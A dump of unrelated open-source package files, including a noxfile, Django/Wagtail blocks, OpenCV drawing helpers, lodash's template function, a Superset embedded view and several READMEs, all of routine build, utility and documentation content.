"""Make sure a CSV with the appropriate header exists."""
expected_header = "date," + ",".join(site["name"] for site in sites) + "\n"
try:
with open(csvfile) as f:
header = next(f)
assert header == expected_header
except (FileNotFoundError, AssertionError):
with open(csvfile, mode="w") as f:
f.write(expected_header)
def append_csv(values) -> None:
# https://stackoverflow.com/a/28164131/409879
ensure_csv()
datetime_string = datetime.now(timezone.utc).astimezone().isoformat()
line = f"{datetime_string},{','.join(str(v[1]) for v in values)}\n"
with open(csvfile, mode="a") as f:
f.write(line)
def plot_file() -> None:
df = pd.read_csv(csvfile, index_col="date", parse_dates=True)
ax = df.plot()
ax.ticklabel_format(style="plain", axis="y") # no exponential notation on y-axis
ax.set_ylabel("Estimated value ($)")
ax.set_xlabel(f"Date (last updated {df.index[-1].date().isoformat()})")
ax.grid()
plt.rcParams["savefig.dpi"] = 144
ax.get_figure().savefig(plotfile, bbox_inches="tight")
def main():
logging.basicConfig(
level=logging.INFO, format="%(asctime)s %(levelname)-8s %(message)s"
)
values = []
for site in sites:
logging.info(f"Start getting {site['name']}")
try:
url = site["url"]
except KeyError:
url = os.environ[site["name"].upper() + "_URL"]
value = retry_get_value(url=url, xpath=site["xpath"])
logging.info(f"Finish getting {site['name']}. {value=}")
values.append((site["name"], value))
append_csv(values)
plot_file()
if __name__ == "__main__":
main() | PypiClean |
/hist-2.6.1.tar.gz/hist-2.6.1/noxfile.py | from __future__ import annotations
import shutil
import sys
from pathlib import Path
import nox
ALL_PYTHONS = ["3.7", "3.8", "3.9", "3.10"]
nox.options.sessions = ["lint", "tests"]
DIR = Path(__file__).parent.resolve()
@nox.session(reuse_venv=True)
def lint(session):
"""
Run the linter.
"""
session.install("pre-commit")
session.run("pre-commit", "run", "--all-files", *session.posargs)
@nox.session
def pylint(session: nox.Session) -> None:
"""
Run pylint.
"""
session.install("pylint")
session.install("-e", ".")
session.run("pylint", "src", *session.posargs)
@nox.session(python=ALL_PYTHONS, reuse_venv=True)
def tests(session):
"""
Run the unit and regular tests.
"""
session.install("-e", ".[test,plot]")
args = ["--mpl"] if sys.platform.startswith("linux") else []
session.run("pytest", *args, *session.posargs)
@nox.session
def regenerate(session):
"""
Regenerate MPL images.
"""
session.install("-e", ".[test,plot]")
if not sys.platform.startswith("linux"):
session.error(
"Must be run from Linux, images will be slightly different on macOS"
)
session.run("pytest", "--mpl-generate-path=tests/baseline", *session.posargs)
@nox.session(reuse_venv=True)
def docs(session):
"""
Build the docs. Pass "serve" to serve.
"""
session.install("-e", ".[docs]")
session.chdir("docs")
session.run("sphinx-build", "-M", "html", ".", "_build")
if session.posargs:
if "serve" in session.posargs:
print("Launching docs at http://localhost:8000/ - use Ctrl-C to quit")
session.run("python", "-m", "http.server", "8000", "-d", "_build/html")
else:
print("Unsupported argument to docs")
@nox.session
def build(session):
"""
Build an SDist and wheel.
"""
build_p = DIR.joinpath("build")
if build_p.exists():
shutil.rmtree(build_p)
session.install("build")
session.run("python", "-m", "build") | PypiClean |
/django_cos-0.4.0.tar.gz/django_cos-0.4.0/django_cos/blocks/metadata_blocks.py | import json
# Django Imports
from django import forms
from django.utils.translation import ugettext_lazy as _
# Wagtail Imports
from wagtail.core import blocks
# Django COS Imports
from django_cos import schema
from django_cos.blocks.base_blocks import MultiSelectBlock
class OpenHoursValue(blocks.StructValue):
"""
Renders selected days as a json list.
"""
@property
def days_json(self):
"""
Custom property to return days as json list instead of default python list.
"""
return json.dumps(self['days'])
class OpenHoursBlock(blocks.StructBlock):
"""
Holds day and time combination for business open hours.
"""
days = MultiSelectBlock(
required=True,
verbose_name=_('Days'),
help_text=_('For late night hours past 23:59, define each day in a separate block.'),
widget=forms.CheckboxSelectMultiple,
choices=(
('Monday', _('Monday')),
('Tuesday', _('Tuesday')),
('Wednesday', _('Wednesday')),
('Thursday', _('Thursday')),
('Friday', _('Friday')),
('Saturday', _('Saturday')),
('Sunday', _('Sunday')),
))
start_time = blocks.TimeBlock(verbose_name=_('Opening time'))
end_time = blocks.TimeBlock(verbose_name=_('Closing time'))
class Meta:
template = 'django_cos/blocks/struct_data_hours.json'
label = _('Open Hours')
value_class = OpenHoursValue
class StructuredDataActionBlock(blocks.StructBlock):
"""
Action object from schema.org
"""
action_type = blocks.ChoiceBlock(
verbose_name=_('Action Type'),
required=True,
choices=schema.SCHEMA_ACTION_CHOICES
)
target = blocks.URLBlock(verbose_name=_('Target URL'))
language = blocks.CharBlock(
verbose_name=_('Language'),
help_text=_('If the action is offered in multiple languages, create separate actions for each language.'),
default='en-US'
)
result_type = blocks.ChoiceBlock(
required=False,
verbose_name=_('Result Type'),
help_text=_('Leave blank for OrderAction'),
choices=schema.SCHEMA_RESULT_CHOICES
)
result_name = blocks.CharBlock(
required=False,
verbose_name=_('Result Name'),
help_text=_('Example: "Reserve a table", "Book an appointment", etc.')
)
extra_json = blocks.RawHTMLBlock(
required=False,
verbose_name=_('Additional action markup'),
classname='monospace',
help_text=_('Additional JSON-LD inserted into the Action dictionary. Must be properties of https://schema.org/Action.')
)
class Meta:
template = 'django_cos/blocks/struct_data_action.json'
label = _('Action') | PypiClean |
/odoo12_addon_website_event_crm-12.0.1.0.1-py3-none-any.whl/odoo/addons/website_event_crm/readme/CONFIGURE.rst | This module allows you to configure opportunity stages to enable some automations.
To advance automatically to the next stage when the opportunity is invited to view an event category on the website:
#. Go to *CRM > Sales > My pipeline*.
#. Hover over one stage name and click on its cogs icon.
#. Choose *Edit Stage*.
#. Enable *Invite automatically to website event category* if you want that
opportunities in that stage, which are related to an event category, get
periodically checked to see if there's a new event published in your website,
belonging to that category, and, if so, invited to check it out.
#. Enable *Advance stage automatically when inviting to website event category*
if you want that, when one of the opportunities in that stage is invited to
check out events published on your website, it advances automatically to the
next stage.
Important: If you don't want to invite automatically on loop, make sure to
enable both options if you enable the 1st one, and make sure the next stage is
not enabled to autonotify.
To configure the frequency of automated notifications:
#. Go to *Settings > Technical > Automation > Scheduled Actions >
Notify all opportunities related to event categories*.
#. Edit *Execute Every*.
Important: That only schedules mails, but they will be sent later when the
*Mail: Email Queue Manager* automated action is triggered. You can configure it
the same way.
| PypiClean |
/cihaidata-unihan-0.4.2.tar.gz/cihaidata-unihan-0.4.2/README.rst | *cihaidata-unihan* - tool to build `unihan`_ into `simple data format`
CSV format. Part of the `cihai`_ project.
|pypi| |docs| |build-status| |coverage| |license|
Unihan's data is disperved across multiple files in the format of::
U+3400 kCantonese jau1
U+3400 kDefinition (same as U+4E18 丘) hillock or mound
U+3400 kMandarin qiū
U+3401 kCantonese tim2
U+3401 kDefinition to lick; to taste, a mat, bamboo bark
U+3401 kHanyuPinyin 10019.020:tiàn
U+3401 kMandarin tiàn
``cihaidata_unihan/process.py`` will download Unihan.zip and build all files into a
single tabular CSV (default output: ``./data/unihan.csv``)::
char,ucn,kCantonese,kDefinition,kHanyuPinyin,kMandarin
丘,U+3400,jau1,(same as U+4E18 丘) hillock or mound,,qiū
㐁,U+3401,tim2,"to lock; to taste, a mat, bamboo bark",10019.020:"tiàn,tiàn"
``process.py`` supports command line arguments. See `cihaidata_unihan/process.py CLI
arguments`_ for information on how you can specify custom columns, files,
download URL's and output destinations.
Being built against unit tests. See the `Travis Builds`_ and
`Revision History`_.
.. _cihai: https://cihai.git-pull.com
.. _cihai-handbook: https://github.com/cihai/cihai-handbook
.. _cihai team: https://github.com/cihai?tab=members
.. _cihai-python: https://github.com/cihai/cihai-python
.. _cihaidata-unihan on github: https://github.com/cihai/cihaidata-unihan
Usage
-----
To download and build your own ``unihan.csv``:
.. code-block:: bash
$ ./cihaidata_unihan/process.py
Creates ``data/unihan.csv``.
See `cihaidata_unihan/process.py CLI arguments`_ for advanced usage examples.
.. _cihaidata_unihan/process.py CLI arguments: http://cihaidata-unihan.readthedocs.org/en/latest/cli.html
Structure
---------
.. code-block:: bash
# dataset metadata, schema information.
datapackage.json
# (future) when this package is stable, unihan.csv will be provided
data/unihan.csv
# stores downloaded Unihan.zip and it's txt file contents (.gitignore'd)
data/build_files/
# script to download + build a SDF csv of unihan.
cihaidata_unihan/process.py
# unit tests to verify behavior / consistency of builder
tests/*
# python 2/3 compatibility modules
cihaidata_unihan/_compat.py
cihaidata_unihan/unicodecsv.py
# python module, public-facing python API.
__init__.py
cihaidata_unihan/__init__.py
# utility / helper functions
cihaidata_unihan/util.py
Cihai is *not* required for:
- ``data/unihan.csv`` - `simple data format`_ compatible csv file.
- ``cihaidata_unihan/process.py`` - create a ``data/unihan.csv``.
When this module is stable, ``data/unihan.csv`` will have prepared
releases, without requires using ``cihaidata_unihan/process.py``. ``process.py``
will not require external libraries.
Examples
--------
- https://github.com/datasets/gdp
- https://github.com/datasets/country-codes
Related links:
- CSV *Simple Data Format* (SDF): http://data.okfn.org/standards/simple-data-format
- Tools: http://data.okfn.org/tools
.. _Travis Builds: https://travis-ci.org/cihai/cihaidata-unihan/builds
.. _Revision History: https://github.com/cihai/cihaidata-unihan/commits/master
.. _cjklib: http://cjklib.org/0.3/
.. _current datasets: http://cihai.readthedocs.org/en/latest/api.html#datasets
.. _permissively licensing your dataset: http://cihai.readthedocs.org/en/latest/information_liberation.html
============== ==========================================================
Python support Python 2.7, >= 3.3, pypy/pypy3
Source https://github.com/cihai/cihaidata-unihan
Docs https://cihaidata-unihan.git-pull.com
Changelog https://cihaidata-unihan.git-pull.com/en/latest/history.html
API https://cihaidata-unihan.git-pull.com/en/latest/api.html
Issues https://github.com/cihai/cihaidata-unihan/issues
Travis https://travis-ci.org/cihai/cihaidata-unihan
Test coverage https://codecov.io/gh/cihai/cihaidata-unihan
pypi https://pypi.python.org/pypi/cihaidata-unihan
OpenHub https://www.openhub.net/p/cihaidata-unihan
License `MIT`_.
git repo .. code-block:: bash
$ git clone https://github.com/cihai/cihaidata-unihan.git
install dev .. code-block:: bash
$ git clone https://github.com/cihai/cihaidata-unihan.git cihai
$ cd ./cihai
$ virtualenv .env
$ source .env/bin/activate
$ pip install -e .
tests .. code-block:: bash
$ python setup.py test
============== ==========================================================
.. _MIT: http://opensource.org/licenses/MIT
.. _Documentation: http://cihai.readthedocs.org/en/latest/
.. _API: http://cihai.readthedocs.org/en/latest/api.html
.. _Unihan: http://www.unicode.org/charts/unihan.html
.. _datapackages: http://dataprotocols.org/data-packages/
.. _datapackage.json format: https://github.com/datasets/gdp/blob/master/datapackage.json
.. _json table schema: http://dataprotocols.org/json-table-schema/
.. _simple data format: http://data.okfn.org/standards/simple-data-format
.. _cihai dataset API: http://cihai.readthedocs.org/en/latest/extending.html
.. _PEP 301\: python package format: http://www.python.org/dev/peps/pep-0301/
.. |pypi| image:: https://img.shields.io/pypi/v/cihaidata-unihan.svg
:alt: Python Package
:target: http://badge.fury.io/py/cihaidata-unihan
.. |build-status| image:: https://img.shields.io/travis/cihai/cihaidata-unihan.svg
:alt: Build Status
:target: https://travis-ci.org/cihai/cihaidata-unihan
.. |coverage| image:: https://codecov.io/gh/cihai/cihaidata-unihan/branch/master/graph/badge.svg
:alt: Code Coverage
:target: https://codecov.io/gh/cihai/cihaidata-unihan
.. |license| image:: https://img.shields.io/github/license/cihai/cihaidata-unihan.svg
:alt: License
.. |docs| image:: https://readthedocs.org/projects/cihaidata-unihan/badge/?version=latest
:alt: Documentation Status
:scale: 100%
:target: https://readthedocs.org/projects/cihaidata-unihan/
| PypiClean |
/B9gemyaeix-4.14.1.tar.gz/B9gemyaeix-4.14.1/weblate/checks/utils.py |
from pygments.lexers.markup import RstLexer
from pygments.token import Token
from weblate.checks.models import CHECKS
def highlight_pygments(source: str, unit):
"""
Highlight syntax characters using pygments.
This is not really a full syntax highlighting, we're only interested in
non-translatable strings.
"""
if "rst-text" in unit.all_flags:
lexer = RstLexer(stripnl=False)
start = 0
for token, text in lexer.get_tokens(source):
if token == Token.Literal.String:
if text[0] == "`" and text != "`_":
yield ((start, start + 1, "`"))
else:
yield ((start, start + len(text), text))
elif token == Token.Literal.String.Interpol:
yield ((start, start + len(text), text))
elif token == Token.Generic.Strong:
end = start + len(text)
yield (start, start + 2, "**")
yield (end - 2, end, "**")
elif token == Token.Generic.Emph:
end = start + len(text)
yield (start, start + 1, "*")
yield (end - 1, end, "*")
start += len(text)
def highlight_string(source: str, unit, hightlight_syntax: bool = False):
"""Return highlights for a string."""
if unit is None:
return []
highlights = []
for check in CHECKS:
if not CHECKS[check].target:
continue
highlights.extend(CHECKS[check].check_highlight(source, unit))
if hightlight_syntax:
highlights.extend(highlight_pygments(source, unit))
# Remove empty strings
highlights = [highlight for highlight in highlights if highlight[2]]
# Sort by order in string
highlights.sort(key=lambda x: x[0])
# Remove overlapping ones
for hl_idx in range(0, len(highlights)):
if hl_idx >= len(highlights):
break
elref = highlights[hl_idx]
for hl_idx_next in range(hl_idx + 1, len(highlights)):
if hl_idx_next >= len(highlights):
break
eltest = highlights[hl_idx_next]
if eltest[0] >= elref[0] and eltest[0] < elref[1]:
# Elements overlap, remove inner one
highlights.pop(hl_idx_next)
elif eltest[0] > elref[1]:
# This is not an overlapping element
break
return highlights | PypiClean |
/cv3-beta-1.2.0.tar.gz/cv3-beta-1.2.0/cv3/draw.py | import cv2
import warnings
import numpy as np
from typing import List
from . import opt
from ._utils import (
type_decorator,
_relative_check,
_relative_handle,
_process_color,
_handle_rect_coords,
COLORS_RGB_DICT
)
__all__ = [
'rectangle',
'polylines',
'fill_poly',
'circle',
'point',
'points',
'line', 'hline', 'vline',
'text', 'putText',
'rectangles',
'COLORS'
]
COLORS = list(COLORS_RGB_DICT)
_LINE_TYPE_DICT = {
'filled': cv2.FILLED,
'line_4': cv2.LINE_4,
'line_8': cv2.LINE_8,
'line_aa': cv2.LINE_AA
}
def _line_type_flag_match(flag):
assert flag in _LINE_TYPE_DICT, f'no such flag: "{flag}". Available: {", ".join(_LINE_TYPE_DICT.keys())}'
return _LINE_TYPE_DICT[flag]
_FONTS_DICT = {
'simplex': cv2.FONT_HERSHEY_SIMPLEX,
'plain': cv2.FONT_HERSHEY_PLAIN,
'duplex': cv2.FONT_HERSHEY_DUPLEX,
'complex': cv2.FONT_HERSHEY_COMPLEX,
'triplex': cv2.FONT_HERSHEY_TRIPLEX,
'complex_small': cv2.FONT_HERSHEY_COMPLEX_SMALL,
'script_simplex': cv2.FONT_HERSHEY_SCRIPT_SIMPLEX,
'script_complex': cv2.FONT_HERSHEY_SCRIPT_COMPLEX,
'italic': cv2.FONT_ITALIC
}
def _font_flag_match(flag):
assert flag in _FONTS_DICT, f'no such flag: "{flag}". Available: {", ".join(_FONTS_DICT.keys())}'
return _FONTS_DICT[flag]
def _draw_decorator(func):
@type_decorator
def wrapper(img, *args, color=None, line_type=cv2.LINE_8, copy=False, **kwargs):
if copy:
img = img.copy()
color = _process_color(color)
if isinstance(line_type, str):
line_type = _line_type_flag_match(line_type)
kwargs['t'] = round(kwargs.get('t', opt.THICKNESS))
return func(img, *args, color=color, line_type=line_type, **kwargs)
return wrapper
# TODO filled=False
@_draw_decorator
def rectangle(img, x0, y0, x1, y1, mode='xyxy', rel=None, **kwargs):
x0, y0, x1, y1 = _handle_rect_coords(img, x0, y0, x1, y1, mode=mode, rel=rel)
cv2.rectangle(img, (x0, y0), (x1, y1), kwargs['color'], kwargs['t'], lineType=kwargs['line_type'])
return img
def _handle_poly_pts(img, pts, rel=None):
pts = np.array(pts).reshape(-1)
pts = _relative_handle(img, *pts, rel=rel)
pts = np.int32(pts).reshape(-1, 1, 2)
return pts
@_draw_decorator
def polylines(img, pts, is_closed=False, rel=None, **kwargs):
"""
:param img:
:param pts: np.array or List[List] ot Tuple[Tuple]
:param is_closed: bool
:return:
"""
pts = _handle_poly_pts(img, pts, rel=rel)
cv2.polylines(img, [pts], is_closed, kwargs['color'], kwargs['t'], lineType=kwargs['line_type'])
return img
@_draw_decorator
def fill_poly(img, pts, rel=None, **kwargs):
"""
:param img:
:param pts: np.array or List[List] ot Tuple[Tuple]
:return:
"""
pts = _handle_poly_pts(img, pts, rel=rel)
cv2.fillPoly(img, [pts], kwargs['color'])
return img
@_draw_decorator
def circle(img, x0, y0, r, rel=None, **kwargs):
x0, y0 = _relative_handle(img, x0, y0, rel=rel)
r = round(r)
cv2.circle(img, (x0, y0), r, kwargs['color'], kwargs['t'], lineType=kwargs['line_type'])
return img
def point(img, x0, y0, r=None, rel=None, **kwargs):
if 't' in kwargs:
kwargs.pop('t')
warnings.warn('Parameter `t` is not used')
if r is None:
r = opt.PT_RADIUS
return circle(img, x0, y0, r, t=-1, rel=rel, **kwargs)
@_draw_decorator
def line(img, x0, y0, x1, y1, rel=None, **kwargs):
x0, y0, x1, y1 = _relative_handle(img, x0, y0, x1, y1, rel=rel)
cv2.line(img, (x0, y0), (x1, y1), kwargs['color'], kwargs['t'], lineType=kwargs['line_type'])
return img
@_draw_decorator
def hline(img, y, rel=None, **kwargs):
h, w = img.shape[:2]
y = round(y * h if _relative_check(y, rel=rel) else y)
cv2.line(img, (0, y), (w, y), kwargs['color'], kwargs['t'], lineType=kwargs['line_type'])
return img
@_draw_decorator
def vline(img, x, rel=None, **kwargs):
h, w = img.shape[:2]
x = round(x * w if _relative_check(x, rel=rel) else x)
cv2.line(img, (x, 0), (x, h), kwargs['color'], kwargs['t'], lineType=kwargs['line_type'])
return img
@_draw_decorator
def text(img, text, x=0.5, y=0.5, font=None, scale=None, flip=False, rel=None, **kwargs):
if font is None:
font = opt.FONT
elif isinstance(font, str):
font = _font_flag_match(font)
scale = scale or opt.SCALE
x, y = _relative_handle(img, x, y, rel=rel)
cv2.putText(
img,
str(text),
(x, y),
fontFace=font,
fontScale=scale,
color=kwargs['color'],
thickness=kwargs['t'],
lineType=kwargs['line_type'],
bottomLeftOrigin=flip
)
return img
@type_decorator
def rectangles(img: np.array, rects: List[List], **kwargs) -> np.array:
for rect in rects:
img = rectangle(img, *rect, **kwargs)
return img
@type_decorator
def points(img: np.array, pts: List[List], **kwargs) -> np.array:
for pt in pts:
img = point(img, *pt, **kwargs)
return img
putText = text | PypiClean |
/xnni-0.7.4-py3-none-manylinux1_x86_64.whl/xnni-0.7.4.data/data/nni/node_modules/lodash/template.js | var assignInWith = require('./assignInWith'),
attempt = require('./attempt'),
baseValues = require('./_baseValues'),
customDefaultsAssignIn = require('./_customDefaultsAssignIn'),
escapeStringChar = require('./_escapeStringChar'),
isError = require('./isError'),
isIterateeCall = require('./_isIterateeCall'),
keys = require('./keys'),
reInterpolate = require('./_reInterpolate'),
templateSettings = require('./templateSettings'),
toString = require('./toString');
/** Used to match empty string literals in compiled template source. */
var reEmptyStringLeading = /\b__p \+= '';/g,
reEmptyStringMiddle = /\b(__p \+=) '' \+/g,
reEmptyStringTrailing = /(__e\(.*?\)|\b__t\)) \+\n'';/g;
/**
* Used to match
* [ES template delimiters](http://ecma-international.org/ecma-262/7.0/#sec-template-literal-lexical-components).
*/
var reEsTemplate = /\$\{([^\\}]*(?:\\.[^\\}]*)*)\}/g;
/** Used to ensure capturing order of template delimiters. */
var reNoMatch = /($^)/;
/** Used to match unescaped characters in compiled string literals. */
var reUnescapedString = /['\n\r\u2028\u2029\\]/g;
/**
* Creates a compiled template function that can interpolate data properties
* in "interpolate" delimiters, HTML-escape interpolated data properties in
* "escape" delimiters, and execute JavaScript in "evaluate" delimiters. Data
* properties may be accessed as free variables in the template. If a setting
* object is given, it takes precedence over `_.templateSettings` values.
*
* **Note:** In the development build `_.template` utilizes
* [sourceURLs](http://www.html5rocks.com/en/tutorials/developertools/sourcemaps/#toc-sourceurl)
* for easier debugging.
*
* For more information on precompiling templates see
* [lodash's custom builds documentation](https://lodash.com/custom-builds).
*
* For more information on Chrome extension sandboxes see
* [Chrome's extensions documentation](https://developer.chrome.com/extensions/sandboxingEval).
*
* @static
* @since 0.1.0
* @memberOf _
* @category String
* @param {string} [string=''] The template string.
* @param {Object} [options={}] The options object.
* @param {RegExp} [options.escape=_.templateSettings.escape]
* The HTML "escape" delimiter.
* @param {RegExp} [options.evaluate=_.templateSettings.evaluate]
* The "evaluate" delimiter.
* @param {Object} [options.imports=_.templateSettings.imports]
* An object to import into the template as free variables.
* @param {RegExp} [options.interpolate=_.templateSettings.interpolate]
* The "interpolate" delimiter.
* @param {string} [options.sourceURL='templateSources[n]']
* The sourceURL of the compiled template.
* @param {string} [options.variable='obj']
* The data object variable name.
* @param- {Object} [guard] Enables use as an iteratee for methods like `_.map`.
* @returns {Function} Returns the compiled template function.
* @example
*
* // Use the "interpolate" delimiter to create a compiled template.
* var compiled = _.template('hello <%= user %>!');
* compiled({ 'user': 'fred' });
* // => 'hello fred!'
*
* // Use the HTML "escape" delimiter to escape data property values.
* var compiled = _.template('<b><%- value %></b>');
* compiled({ 'value': '<script>' });
* // => '<b><script></b>'
*
* // Use the "evaluate" delimiter to execute JavaScript and generate HTML.
* var compiled = _.template('<% _.forEach(users, function(user) { %><li><%- user %></li><% }); %>');
* compiled({ 'users': ['fred', 'barney'] });
* // => '<li>fred</li><li>barney</li>'
*
* // Use the internal `print` function in "evaluate" delimiters.
* var compiled = _.template('<% print("hello " + user); %>!');
* compiled({ 'user': 'barney' });
* // => 'hello barney!'
*
* // Use the ES template literal delimiter as an "interpolate" delimiter.
* // Disable support by replacing the "interpolate" delimiter.
* var compiled = _.template('hello ${ user }!');
* compiled({ 'user': 'pebbles' });
* // => 'hello pebbles!'
*
* // Use backslashes to treat delimiters as plain text.
* var compiled = _.template('<%= "\\<%- value %\\>" %>');
* compiled({ 'value': 'ignored' });
* // => '<%- value %>'
*
* // Use the `imports` option to import `jQuery` as `jq`.
* var text = '<% jq.each(users, function(user) { %><li><%- user %></li><% }); %>';
* var compiled = _.template(text, { 'imports': { 'jq': jQuery } });
* compiled({ 'users': ['fred', 'barney'] });
* // => '<li>fred</li><li>barney</li>'
*
* // Use the `sourceURL` option to specify a custom sourceURL for the template.
* var compiled = _.template('hello <%= user %>!', { 'sourceURL': '/basic/greeting.jst' });
* compiled(data);
* // => Find the source of "greeting.jst" under the Sources tab or Resources panel of the web inspector.
*
* // Use the `variable` option to ensure a with-statement isn't used in the compiled template.
* var compiled = _.template('hi <%= data.user %>!', { 'variable': 'data' });
* compiled.source;
* // => function(data) {
* // var __t, __p = '';
* // __p += 'hi ' + ((__t = ( data.user )) == null ? '' : __t) + '!';
* // return __p;
* // }
*
* // Use custom template delimiters.
* _.templateSettings.interpolate = /{{([\s\S]+?)}}/g;
* var compiled = _.template('hello {{ user }}!');
* compiled({ 'user': 'mustache' });
* // => 'hello mustache!'
*
* // Use the `source` property to inline compiled templates for meaningful
* // line numbers in error messages and stack traces.
* fs.writeFileSync(path.join(process.cwd(), 'jst.js'), '\
* var JST = {\
* "main": ' + _.template(mainText).source + '\
* };\
* ');
*/
function template(string, options, guard) {
// Based on John Resig's `tmpl` implementation
// (http://ejohn.org/blog/javascript-micro-templating/)
// and Laura Doktorova's doT.js (https://github.com/olado/doT).
var settings = templateSettings.imports._.templateSettings || templateSettings;
if (guard && isIterateeCall(string, options, guard)) {
options = undefined;
}
string = toString(string);
options = assignInWith({}, options, settings, customDefaultsAssignIn);
var imports = assignInWith({}, options.imports, settings.imports, customDefaultsAssignIn),
importsKeys = keys(imports),
importsValues = baseValues(imports, importsKeys);
var isEscaping,
isEvaluating,
index = 0,
interpolate = options.interpolate || reNoMatch,
source = "__p += '";
// Compile the regexp to match each delimiter.
var reDelimiters = RegExp(
(options.escape || reNoMatch).source + '|' +
interpolate.source + '|' +
(interpolate === reInterpolate ? reEsTemplate : reNoMatch).source + '|' +
(options.evaluate || reNoMatch).source + '|$'
, 'g');
// Use a sourceURL for easier debugging.
var sourceURL = 'sourceURL' in options ? '//# sourceURL=' + options.sourceURL + '\n' : '';
string.replace(reDelimiters, function(match, escapeValue, interpolateValue, esTemplateValue, evaluateValue, offset) {
interpolateValue || (interpolateValue = esTemplateValue);
// Escape characters that can't be included in string literals.
source += string.slice(index, offset).replace(reUnescapedString, escapeStringChar);
// Replace delimiters with snippets.
if (escapeValue) {
isEscaping = true;
source += "' +\n__e(" + escapeValue + ") +\n'";
}
if (evaluateValue) {
isEvaluating = true;
source += "';\n" + evaluateValue + ";\n__p += '";
}
if (interpolateValue) {
source += "' +\n((__t = (" + interpolateValue + ")) == null ? '' : __t) +\n'";
}
index = offset + match.length;
// The JS engine embedded in Adobe products needs `match` returned in
// order to produce the correct `offset` value.
return match;
});
source += "';\n";
// If `variable` is not specified wrap a with-statement around the generated
// code to add the data object to the top of the scope chain.
var variable = options.variable;
if (!variable) {
source = 'with (obj) {\n' + source + '\n}\n';
}
// Cleanup code by stripping empty strings.
source = (isEvaluating ? source.replace(reEmptyStringLeading, '') : source)
.replace(reEmptyStringMiddle, '$1')
.replace(reEmptyStringTrailing, '$1;');
// Frame code as the function body.
source = 'function(' + (variable || 'obj') + ') {\n' +
(variable
? ''
: 'obj || (obj = {});\n'
) +
"var __t, __p = ''" +
(isEscaping
? ', __e = _.escape'
: ''
) +
(isEvaluating
? ', __j = Array.prototype.join;\n' +
"function print() { __p += __j.call(arguments, '') }\n"
: ';\n'
) +
source +
'return __p\n}';
var result = attempt(function() {
return Function(importsKeys, sourceURL + 'return ' + source)
.apply(undefined, importsValues);
});
// Provide the compiled function's source by its `toString` method or
// the `source` property as a convenience for inlining compiled templates.
result.source = source;
if (isError(result)) {
throw result;
}
return result;
}
module.exports = template; | PypiClean |
/superset-2.0.0-custom-test-0.0.1.tar.gz/superset-2.0.0-custom-test-0.0.1/superset/embedded/view.py | import json
from typing import Callable
from flask import abort
from flask_appbuilder import expose
from flask_login import AnonymousUserMixin, LoginManager
from superset import event_logger, is_feature_enabled, security_manager
from superset.embedded.dao import EmbeddedDAO
from superset.superset_typing import FlaskResponse
from superset.utils import core as utils
from superset.views.base import BaseSupersetView, common_bootstrap_payload
class EmbeddedView(BaseSupersetView):
"""The views for embedded resources to be rendered in an iframe"""
route_base = "/embedded"
@expose("/<uuid>")
@event_logger.log_this_with_extra_payload
def embedded(
self,
uuid: str,
add_extra_log_payload: Callable[..., None] = lambda **kwargs: None,
) -> FlaskResponse:
"""
Server side rendering for the embedded dashboard page
:param uuid: identifier for embedded dashboard
:param add_extra_log_payload: added by `log_this_with_manual_updates`, set a
default value to appease pylint
"""
if not is_feature_enabled("EMBEDDED_SUPERSET"):
abort(404)
embedded = EmbeddedDAO.find_by_id(uuid)
if not embedded:
abort(404)
# Log in as an anonymous user, just for this view.
# This view needs to be visible to all users,
# and building the page fails if g.user and/or ctx.user aren't present.
login_manager: LoginManager = security_manager.lm
login_manager.reload_user(AnonymousUserMixin())
add_extra_log_payload(
embedded_dashboard_id=uuid,
dashboard_version="v2",
)
bootstrap_data = {
"common": common_bootstrap_payload(),
"embedded": {
"dashboard_id": embedded.dashboard_id,
},
}
return self.render_template(
"superset/spa.html",
entry="embedded",
bootstrap_data=json.dumps(
bootstrap_data, default=utils.pessimistic_json_iso_dttm_ser
),
) | PypiClean |
/ait_core-2.5.0.tar.gz/ait_core-2.5.0/README.rst |
.. image:: https://github.com/NASA-AMMOS/AIT-Core/actions/workflows/full_build.yaml/badge.svg?branch=master
:target: https://github.com/NASA-AMMOS/AIT-Core/actions
:alt: Build and Lint Status
.. image:: https://readthedocs.org/projects/ait-core/badge/?version=latest
:target: https://ait-core.readthedocs.io/en/latest/?badge=latest
:alt: Documentation Status
The AMMOS Instrument Toolkit (Formerly the Bespoke Links to Instruments
for Surface and Space (BLISS)) is a Python-based software suite
developed to handle Ground Data System (GDS), Electronic Ground Support
Equipment (EGSE), commanding, telemetry uplink/downlink, and sequencing
for instrument and CubeSat Missions. It is a generalization and expansion
of tools developed for a number of ISS
missions.
Getting Started
===============
You can read through the `Installation and Configuration
Page <http://ait-core.readthedocs.io/en/latest/installation.html>`__ for
instructions on how to install AIT Core.
You can read through the `New Project Setup
Page <http://ait-core.readthedocs.io/en/latest/project_setup.html>`__
for instructions on how to use AIT on your next project.
Join the Community
==================
The project's `User and Developer Mailing List <https://groups.google.com/forum/#!forum/ait-dev>`__ is the best way to communicate with the team, ask questions, brainstorm plans for future changes, and help contribute to the project.
This project exists thanks to the dedicated users, contributors, committers, and project management committee members. If you'd like to learn more about how the project is organized and how to become a part of the team please check out the `Project Structure and Governance <https://github.com/NASA-AMMOS/AIT-Core/wiki/Project-Structure-and-Governance>`__ documentation.
Contributing
============
Thank you for your interest in contributing to AIT! We welcome contributions from people of all backgrounds and disciplines. While much of the focus of our project is software, we believe that many of the most critical contributions come in the form of documentation improvements, asset generation, user testing and feedback, and community involvement. So if you're interested and want to help out please don't hesitate! Send us an email on the public mailing list below, introduce yourself, and join the community.
Communication
-------------
All project communication happens via mailing lists. Discussions related to development should happen on the public `Developer and User Mailing List <https://groups.google.com/forum/#!forum/ait-dev>`__. If you're new to the community make sure to introduce yourself as well!
Dev Installation
----------------
As always, we encourage you to install AIT into a virtual environment of your choosing when you set up your development environment. AIT uses `poetry` for package management. Before setting up your development environment you will need the following installed and ready to use:
- A virtual environment "manager" of your choosing with a configured and activated virtual environment. Since AIT uses `poetry` you can consider leveraging its `environment management <https://python-poetry.org/docs/managing-environments/>`__ functionality as well (one possible way to set this up is sketched after this list).
- Using `poetry shell` is also very convenient for development testing and simplifying environment management. You should make sure to install the package into the shell to get access to the development dependencies as well. It's recommended that you use `poetry shell` when running the tox builds because other virtual environment managers will often prevent tox from accessing `pyenv`-installed Python versions.
- `pyenv <https://github.com/pyenv/pyenv>`__ so you can easily install different Python versions
- `poetry <https://python-poetry.org/docs/#installation>`__ installed either to your specific virtual environment or system-wide, whichever you prefer.
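If you want `poetry` to manage an environment built on a `pyenv`-installed interpreter, one possible sequence is sketched below (the exact Python version shown is only an illustration; adjust it to one listed in ``.python-version``)::

    # install an interpreter with pyenv (version is illustrative)
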